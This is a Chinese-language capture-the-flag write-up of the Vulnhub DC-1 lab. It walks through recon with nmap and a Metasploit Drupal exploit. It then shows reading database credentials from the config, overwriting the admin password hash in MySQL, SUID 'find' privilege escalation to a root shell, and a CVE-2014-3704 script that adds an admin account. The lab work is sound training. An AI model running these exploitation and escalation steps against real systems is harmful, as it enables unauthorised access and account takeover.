【Vulnhub靶机系列】DC1

秒速五厘米 2022-10-21 11:58 172阅读 0赞

**基本信息**

Kali： 192.168.56.116

DC1: 192.168.56.115

**实验过程**

先在Kali中使用arp-scan进行主机探活

sudo arp-scan --interface=eth1 192.168.56.0/24

![图片][3fdd8028f81dde5049382f6d2344aff3.png]

逐个排查发现DC1的IP地址为192.168.56.115

然后使用nmap对主机进行探测:

nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115

![图片][f420d154d94e275ca41868515ec5ff7d.png]

主机分别开了: 22,80,111端口

我们先从80端口入手

![图片][09339e5191bdb9557f365522c03f7c32.png]

可以发现网站是Drupal cms管理系统

我们启动msf，搜索下Drupal可用的EXP

> msf > search Drupal

![图片][bbbcaa228be8341c6d9f77a5891aca14.png]

这里我们选用

exploit/unix/webapp/drupal\_drupalgeddon2

因为他是最新的，而且品质为excellent

msf6 > use exploit/unix/webapp/drupal_coder_execmsf6 exploit(unix/webapp/drupal_coder_exec) > show optionsmsf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116msf6 exploit(unix/webapp/drupal_coder_exec) > run

![图片][98381c3290ffd57c195644addb1a427c.png]

这样我们就可以成功得到一个会话

我们用会话返回一个shell

![图片][1f209f3154466a1e61ea7d85081edc64.png]

发现flag1.txt

查看下flag1.txt内容

![图片][aef8f8c06a95203bbd7883c126a37065.png]

给我们一个提示 Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置

![图片][9885a37a2b84ab3d2cc208205c97dee3.png]

> sites/default/files

![图片][89e2596efe75954851607ac47e8e3af9.png]

里面可以看到数据库的账号密码，同时我们还可以看到flag2的内容说：爆破不是唯一获得访问权限方法

'database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t',

![图片][2d7414ecc27b83c99345fe126e259e01.png]

那么我们用获得数据库的账号密码登录下数据看看

这里需要注意的是，我们需要用python转换成标准的shell，否则就会出现下面的场景，进入mysql之后，shell就没有反应:

![图片][6ff7622c1200d56c83abc15979c65696.png]

我们输入

python -c "import pty;pty.spawn('/bin/bash')"

![图片][904e74448eca1bcc6978dd61690e0bf8.png]

mysql> show database;
    mysql> use drupaldb;
    mysql> show tables;
    mysql> select * from users;
    mysql> select name,pass from users;

![图片][78f77790811f17e7cd5248fba016e351.png]

这里的密码是经过drupal加密

在scripts的文件夹中有用来算密码的脚本，但是因为靶机的环境原因会报错。

![图片][4f24203f7e648aa30b5b1d6f4cf235e0.png]

网上找了下，直接用别人算好的hash进行替换

明文：password密文：$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

![图片][07b27e363fb36fc4efce7f1dbc777b45.png]

接下来我们把管理员的密码重置下

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'where name='admin';

![图片][c9aff5de2b7115b97e29bc96e7bfd7d6.png]

然后进行登录

![图片][6a87e3adf0226f3930d8b06e39e9faa4.png]

然后发现flag3

![图片][fb37262b47629c58674fec07c9c636a0.png]

从flag3的内容可以看到，提示我们需要用find提权同时我们也可以在家目录中找到flag4.

![图片][51e660a17fedc38e6a3eac03f6c28192.png]

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?

我们使用find找下具有root权限的suid。

> \# -perm  按照文件权限来查找文件
> 
> \# -u=w 基于用于可写查找
> 
> \# -type f 查找普通类型文件
> 
> find / -perm -u=s -type f 2>/dev/null

![图片][c39a3aec4498acfc6e19bdcca9e8e71a.png]

可以看到find是可以用来提权的

我们尝试用find执行命令

> \# 这里需要注意-name参数填写的文件名，是需要系统真实存在的
> 
> www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \\;

![图片][a7099da70dd5ea695e3c35e76ba53a0a.png]

那么我们接下来用find提权

www‐data@DC‐1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;

![图片][55354a1cb66e27b2172ffe0e6117ca30.png]

这样我们就拿到最终的flag

**额外内容**

**使用CVE2014-3704添加管理账号**

在exploit-db中有可以直接利用的EXP，可以直接添加管理账号地址：https://www.exploit-db.com/exploits/34992 我们在Kali上开启HTTP服务，让靶机从Kali上下载EXP

![图片][c3b6bda1564322a929fa50231f552bd7.png]

然后我们通过这个EXP创建管理账号

> www‐data@DC‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067

![图片][564867ec262f09946031bb557a0fc7f8.png]

然后就可以正常登录

![图片][2d0ac132e4f6b2c1f7415ca75e6f1caf.png]

另一种查询具有root权限命令的find语句

> find / -user root -perm -4000 -print 2>/dev/null

![图片][8916295288444f99435bce0ad9005a5e.png]

[3fdd8028f81dde5049382f6d2344aff3.png]: /images/20221021/f1072d9ecc30407f9468b3e19400e18f.png
[f420d154d94e275ca41868515ec5ff7d.png]: /images/20221021/67fe074ad6254746bc9028206ea8529e.png
[09339e5191bdb9557f365522c03f7c32.png]: /images/20221021/2ae2780e14a645858df868cc5080db4a.png
[bbbcaa228be8341c6d9f77a5891aca14.png]: /images/20221021/309f3fa8234546ebaaec7aa18ace7e07.png
[98381c3290ffd57c195644addb1a427c.png]: /images/20221021/642779cc467e40e497466bcd9d0f6042.png
[1f209f3154466a1e61ea7d85081edc64.png]: /images/20221021/6da2ed083a164424b35f0cf037a203bd.png
[aef8f8c06a95203bbd7883c126a37065.png]: /images/20221021/8fd7ec135a134eeba13ef3fbd3eb6a1e.png
[9885a37a2b84ab3d2cc208205c97dee3.png]: /images/20221021/91cc38982ed44da3a2f9bfc02024b92e.png
[89e2596efe75954851607ac47e8e3af9.png]: /images/20221021/9ea0895760ff426c94e41c877c159f9b.png
[2d7414ecc27b83c99345fe126e259e01.png]: /images/20221021/e6b3c89a8da74c41a0eb7e93b9323258.png
[6ff7622c1200d56c83abc15979c65696.png]: /images/20221021/b594e98558ad44c0b9eadbf34cf8a2f8.png
[904e74448eca1bcc6978dd61690e0bf8.png]: /images/20221021/433ada1acfb248acabfe7fa807593959.png
[78f77790811f17e7cd5248fba016e351.png]: /images/20221021/fed51ce3a35e4362b5a322c0a331300c.png
[4f24203f7e648aa30b5b1d6f4cf235e0.png]: /images/20221021/8b01ce0d734c4403a2fd72e3015e70c0.png
[07b27e363fb36fc4efce7f1dbc777b45.png]: /images/20221021/1592644535a141ca860b27dd38f20abf.png
[c9aff5de2b7115b97e29bc96e7bfd7d6.png]: /images/20221021/2e35346dc5984116a0c20059f13d1fa8.png
[6a87e3adf0226f3930d8b06e39e9faa4.png]: /images/20221021/28771ab36b264ff49500356cfdceeb9c.png
[fb37262b47629c58674fec07c9c636a0.png]: /images/20221021/81581f1637b24279aa391043ef5648c5.png
[51e660a17fedc38e6a3eac03f6c28192.png]: /images/20221021/87e5594af2604029917e4ae1d3b2a8a6.png
[c39a3aec4498acfc6e19bdcca9e8e71a.png]: /images/20221021/6069e766466f4ddfae7df66842dd34fa.png
[a7099da70dd5ea695e3c35e76ba53a0a.png]: /images/20221021/7919c3b5ba71473f8697fad98c2e9278.png
[55354a1cb66e27b2172ffe0e6117ca30.png]: /images/20221021/6ef144a01a1c4dbe925a961cd90f6ef3.png
[c3b6bda1564322a929fa50231f552bd7.png]: /images/20221021/f87cc1efa0914d3dae534061eb3661f5.png
[564867ec262f09946031bb557a0fc7f8.png]: /images/20221021/b00e6d36bd8141c781ef3113248ca407.png
[2d0ac132e4f6b2c1f7415ca75e6f1caf.png]: /images/20221021/443529ee79794f138b0f7064c0db5673.png
[8916295288444f99435bce0ad9005a5e.png]: /images/20221021/f307fdf918d542e79b780ceff47d6771.png